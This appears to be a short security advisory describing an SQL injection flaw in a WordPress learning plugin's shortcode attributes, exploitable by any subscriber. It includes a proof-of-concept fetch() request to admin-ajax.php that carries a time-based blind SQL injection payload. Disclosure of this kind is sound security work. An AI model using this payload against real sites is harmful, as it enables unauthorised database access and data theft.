The plugin does not validate and escape some of its shortcode attributes before using them in SQL statement/s, which could allow any authenticated users, such as subscriber to perform SQL Injection attacks Note: The original advisory mentioned that the issue is only exploitable by contributors, but we confirmed that any authenticated users, such as subscriber, can exploit it.
Run the below command in the developer console of the web browser while being on the blog as a subscriber user
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": "action=parse-media-shortcode&shortcode=[learn_press_recent_courses order=' AND (SELECT 42 FROM (SELECT(SLEEP(5)))b)' limit='1']",
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));